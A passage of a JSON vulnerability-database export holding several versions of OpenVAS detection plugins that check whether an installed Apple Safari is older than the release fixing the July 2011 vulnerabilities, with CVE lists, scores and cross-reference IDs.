"ORACLELINUX_ELSA-2012-0016.NASL", "ITUNES_10_5.NASL"], "type": "nessus"}, {"idList": ["USN-1334-1"], "type": "ubuntu"}, {"idList": ["MSVR11-009"], "type": "msvr"}, {"idList": ["PACKETSTORM:105943"], "type": "packetstorm"}, {"idList": ["RHSA-2012:0016"], "type": "redhat"}, {"idList": ["SAINT:93F870242C8D8DFE6FB0218061E2532F", "SAINT:92788531D3EC95DEA25C0A30FCD1E592", "SAINT:E8E10FFE061EB44A3ED40AD04B13EC24"], "type": "saint"}, {"idList": ["SSV:20761", "SSV:20769", "SSV:20751", "SSV:20762", "SSV:26024", "SSV:21013", "SSV:20768"], "type": "seebug"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/SAFARI_XSLT_OUTPUT", "MSF:AUXILIARY/SERVER/WEBKIT_XSLT_DROPPER"], "type": "metasploit"}, {"idList": ["OPENVAS:70712", "OPENVAS:802233", "OPENVAS:831506", "OPENVAS:902543", "OPENVAS:881090", "OPENVAS:1361412562310840868", "OPENVAS:1361412562310802193", "OPENVAS:802193", "OPENVAS:1361412562310802233", "OPENVAS:1361412562310831506"], "type": "openvas"}, {"idList": ["1337DAY-ID-22651"], "type": "zdt"}, {"idList": ["SECURITYVULNS:DOC:26756", "SECURITYVULNS:DOC:26757", "SECURITYVULNS:DOC:27151", "SECURITYVULNS:VULN:11974", "SECURITYVULNS:VULN:11971", "SECURITYVULNS:DOC:26668", "SECURITYVULNS:DOC:26666", "SECURITYVULNS:VULN:11798", "SECURITYVULNS:DOC:26755", "SECURITYVULNS:DOC:27156"], "type": "securityvulns"}, {"idList": ["EDB-ID:17993"], "type": "exploitdb"}, {"idList": ["ZDI-11-239", "ZDI-11-240", "ZDI-11-140", "ZDI-11-243", "ZDI-11-242", "ZDI-11-138", "ZDI-11-241"], "type": "zdi"}, {"idList": ["CVE-2011-0234", "CVE-2011-1462", "CVE-2011-1457", "CVE-2011-0219", "CVE-2011-0254", "CVE-2011-0242", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-1288", "CVE-2010-1383"], "type": "cve"}]}, "score": {"modified": "2019-05-29T18:39:44", "value": 10.6, "vector": "NONE"}}, "hash": "da79d90c1e0ba71906141d7915916ed40030f67f82b282a37520f3ab3f090baf", "hashmap": [{"hash": "834922d12c2c5621cba47517fe4dfc01", "key": "title"}, {"hash": "e3b49025dc785ac38bc3cb68e0b303aa", "key": "cvelist"}, {"hash": "1d642e54ded4d21a662dd27ff0bbf623", "key": "pluginID"}, {"hash": "9b79284313cbecfba7ee9daece275486", "key": "published"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "18de6c9a8c4d88a597e323f96759a2f7", "key": "sourceData"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "8b3416ddddfb6b12b0926d0c42fb23e1", "key": "reporter"}, {"hash": "100df4c554f3a5e3dde24cf0713cff40", "key": "references"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b4c2a4b2d0ef11340f06a32ba5a99466", "key": "description"}, {"hash": "2c104a45bc8ee43625332611b190dc40", "key": "modified"}, {"hash": "4e28b7feca97a88515bab30ea46bd7a3", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "id": "OPENVAS:1361412562310902543", "lastseen": "2019-05-29T18:39:44", "modified": "2018-10-20T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310902543", "published": "2011-07-27T00:00:00", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html", "http://www.apple.com/safari/download/"], "reporter": "Copyright (C) 2011 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4808\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_mandatory_keys(\"AppleSafari/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\");\n script_tag(name:\"affected\", value:\"Apple Safari versions prior to 5.1\");\n script_tag(name:\"insight\", value:\"For more details about the vulnerabilities refer the reference section.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari version 5.1 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.apple.com/safari/download/\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "viewCount": 2}, "differentElements": ["references", "modified", "sourceData"], "edition": 6, "lastseen": "2019-05-29T18:39:44"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-0221", "CVE-2011-0234", "CVE-2011-0225", "CVE-2011-0215", "CVE-2011-1462", "CVE-2011-0238", "CVE-2011-0216", "CVE-2011-0223", "CVE-2011-0241", "CVE-2011-1457", "CVE-2011-0240", "CVE-2011-0219", "CVE-2011-0218", "CVE-2011-0217", "CVE-2011-0254", "CVE-2011-0255", "CVE-2011-0242", "CVE-2011-0222", "CVE-2010-1420", "CVE-2011-1453", "CVE-2011-0233", "CVE-2011-0237", "CVE-2011-1797", "CVE-2011-1288", "CVE-2011-0253", "CVE-2011-0232", "CVE-2011-3443", "CVE-2011-1774", "CVE-2011-0214", "CVE-2011-0244", "CVE-2011-0235", "CVE-2010-1383"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ea683f9779d45ade00409d0aa2dc5b505fedd9c60280d3a052a21251e4aa1ee7", "hashmap": [{"hash": "834922d12c2c5621cba47517fe4dfc01", "key": "title"}, {"hash": "e3b49025dc785ac38bc3cb68e0b303aa", "key": "cvelist"}, {"hash": "47b7af37442829b528c09669b775ce82", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "4470ee42d3ccf970ceff91ef67a5caf0", "key": "references"}, {"hash": "1d642e54ded4d21a662dd27ff0bbf623", "key": "pluginID"}, {"hash": "9b79284313cbecfba7ee9daece275486", "key": "published"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "8b3416ddddfb6b12b0926d0c42fb23e1", "key": "reporter"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b4c2a4b2d0ef11340f06a32ba5a99466", "key": "description"}, {"hash": "4e28b7feca97a88515bab30ea46bd7a3", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902543", "id": "OPENVAS:1361412562310902543", "lastseen": "2018-08-30T19:27:30", "modified": "2018-04-06T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310902543", "published": "2011-07-27T00:00:00", "references": ["http://support.apple.com/kb/HT4808", "http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html"], "reporter": "Copyright (C) 2011 SecPod", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_july11.nasl 9351 2018-04-06 07:05:43Z cfischer $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari versions prior to 5.1\";\ntag_insight = \"For more details about the vulnerabilities refer the reference section.\";\ntag_solution = \"Upgrade to Apple Safari version 5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\";\ntag_summary = \"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"$Revision: 9351 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:05:43 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4808\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer){\n exit(0);\n}\n\n## Grep for Apple Safari Versions prior to 5.1 (5.34.50.0)\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")){\n security_message(0);\n}\n", "title": "Apple Safari Multiple Vulnerabilities - July 2011", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:27:30"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "e3b49025dc785ac38bc3cb68e0b303aa"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "description", "hash": "b4c2a4b2d0ef11340f06a32ba5a99466"}, {"key": "href", "hash": "4e28b7feca97a88515bab30ea46bd7a3"}, {"key": "modified", "hash": "d7d3ade0b372d2f203b9e9f647db6fdd"}, {"key": "naslFamily", "hash": "0db377921f4ce762c62526131097968f"}, {"key": "pluginID", "hash": "1d642e54ded4d21a662dd27ff0bbf623"}, {"key": "published", "hash": "9b79284313cbecfba7ee9daece275486"}, {"key": "references", "hash": "bdf372d84f8a91d0722aaa8496655e1d"}, {"key": "reporter", "hash": "8b3416ddddfb6b12b0926d0c42fb23e1"}, {"key": "sourceData", "hash": "de377eb51ac5fb261e370ae558c48edd"}, {"key": "title", "hash": "834922d12c2c5621cba47517fe4dfc01"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "585a5f3ec5b6a1a97b896f0136c4d9eb3c496482883be115810ba7aa259396a9", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:802233", "OPENVAS:902543", "OPENVAS:1361412562310802233", "OPENVAS:802193", "OPENVAS:1361412562310802193", "OPENVAS:1361412562310831506", "OPENVAS:831506", "OPENVAS:1361412562310881090", "OPENVAS:840868", "OPENVAS:136141256231070712"]}, {"type": "seebug", "idList": ["SSV:20751", "SSV:21013", "SSV:26024", "SSV:20762", "SSV:20768", "SSV:20769", "SSV:20761"]}, {"type": "nessus", "idList": ["MACOSX_SAFARI5_1.NASL", "SAFARI_5_1.NASL", "ITUNES_10_5.NASL", "ITUNES_10_5_BANNER.NASL", "SUSE_11_LIBWEBKIT-110725.NASL", "MANDRIVA_MDVSA-2011-188.NASL", "ORACLELINUX_ELSA-2012-0016.NASL", "DEBIAN_DSA-2394.NASL", "UBUNTU_USN-1334-1.NASL"]}, {"type": "cve", "idList": ["CVE-2011-1453", "CVE-2011-0219", "CVE-2011-1462", "CVE-2011-0234", "CVE-2011-1288", "CVE-2010-1383", "CVE-2011-0233", "CVE-2011-0242", "CVE-2011-1457", "CVE-2011-0253"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26666", "SECURITYVULNS:VULN:11798", "SECURITYVULNS:DOC:27156", "SECURITYVULNS:VULN:11974", "SECURITYVULNS:DOC:26756", "SECURITYVULNS:DOC:26755", "SECURITYVULNS:DOC:26668", "SECURITYVULNS:DOC:27151", "SECURITYVULNS:VULN:11971", "SECURITYVULNS:DOC:26669"]}, {"type": "zdi", "idList": ["ZDI-11-240", "ZDI-11-140", "ZDI-11-239", "ZDI-11-138", "ZDI-11-241", "ZDI-11-242", "ZDI-11-243"]}, {"type": "zdt", "idList": ["1337DAY-ID-22651"]}, {"type": "saint", "idList": ["SAINT:93F870242C8D8DFE6FB0218061E2532F", "SAINT:92788531D3EC95DEA25C0A30FCD1E592", "SAINT:E8E10FFE061EB44A3ED40AD04B13EC24"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SERVER/WEBKIT_XSLT_DROPPER", "MSF:EXPLOIT/WINDOWS/BROWSER/SAFARI_XSLT_OUTPUT"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105943"]}, {"type": "msvr", "idList": ["MSVR11-009"]}, {"type": "suse", "idList": ["SUSE-SU-2011:0857-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:17993"]}, {"type": "ubuntu", "idList": ["USN-1334-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2394-1:72A72"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0016"]}, {"type": "centos", "idList": ["CESA-2012:0016"]}], "modified": "2019-07-17T14:31:16"}, "score": {"value": 10.2, "vector": "NONE", "modified": "2019-07-17T14:31:16"}, "vulnersScore": 10.2}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Multiple Vulnerabilities - July 2011\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902543\");\n script_version(\"2019-07-16T15:57:25+0000\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 15:57:25 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-07-27 09:16:39 +0200 (Wed, 27 Jul 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4808\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2011/Jul/msg00002.html\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_mandatory_keys(\"AppleSafari/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions prior to 5.1\");\n\n script_tag(name:\"insight\", value:\"Please see the references for more details about the vulnerabilities.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari version 5.1 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/Version\");\nif(!safVer)\n exit(0);\n\nif(version_is_less(version:safVer, test_version:\"5.34.50.0\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "naslFamily": "General", "pluginID": "1361412562310902543", "scheme": null}

{"openvas": [{"lastseen": "2017-09-04T14:19:56", "bulletinFamily": "scanner", "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "modified": "2017-09-01T00:00:00", "published": "2011-08-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802233", "id": "OPENVAS:802233", "title": "Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_safari_mult_vuln_july11_macosx.nasl 7044 2017-09-01 11:50:59Z teissa $\n#\n# Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation may result in information disclosure, remote code\n execution, denial of service, or other consequences.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari versions prior to 5.0.6/5.1\";\ntag_insight = \"For more details about the vulnerabilities refer the reference section.\";\ntag_solution = \"Upgrade to Apple Safari version 5.0.6/5.1 or later,\n For updates refer to http://www.apple.com/safari/download/\";\ntag_summary = \"The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(802233);\n script_version(\"$Revision: 7044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-01 13:50:59 +0200 (Fri, 01 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-12 14:44:50 +0200 (Fri, 12 Aug 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", \"CVE-2011-1797\", \"CVE-2011-3443\");\n script_bugtraq_id(48820, 48823, 48825, 48827, 48828, 48831, 48832, 48833, 48837,\n 48839, 48840, 48841, 48842, 48843, 48844, 48845, 48846, 48847,\n 48848, 48849, 48850, 48851, 48852, 48853, 48854, 48855, 48856,\n 48857, 48858, 48859, 51035);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT4808\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2011//Jul/msg00002.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_require_keys(\"AppleSafari/MacOSX/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafVer = get_kb_item(\"AppleSafari/MacOSX/Version\");\nif(!safVer){\n exit(0);\n}\n\n## Grep for Apple Safari Versions prior to 5.0.6\nif(version_is_less(version:safVer, test_version:\"5.0.6\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-17T14:31:06", "bulletinFamily": "scanner", "description": "The host is installed with Apple Safari web browser and is prone\n to multiple vulnerabilities.", "modified": "2019-07-16T00:00:00", "published": "2011-08-12T00:00:00", "id": "OPENVAS:1361412562310802233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802233", "title": "Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Multiple Vulnerabilities - July 2011 (Mac OS X)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802233\");\n script_version(\"2019-07-16T15:57:25+0000\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 15:57:25 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-08-12 14:44:50 +0200 (Fri, 12 Aug 2011)\");\n script_cve_id(\"CVE-2010-1383\", \"CVE-2010-1420\", \"CVE-2011-0214\", \"CVE-2011-0215\",\n \"CVE-2011-0216\", \"CVE-2011-0217\", \"CVE-2011-0218\", \"CVE-2011-0219\",\n \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\", \"CVE-2011-0225\",\n \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\", \"CVE-2011-0235\",\n \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\", \"CVE-2011-0241\",\n \"CVE-2011-0242\", \"CVE-2011-0244\", \"CVE-2011-0253\", \"CVE-2011-0254\",\n \"CVE-2011-0255\", \"CVE-2011-1288\", \"CVE-2011-1453\", \"CVE-2011-1457\",\n \"CVE-2011-1462\", \"CVE-2011-1774\", 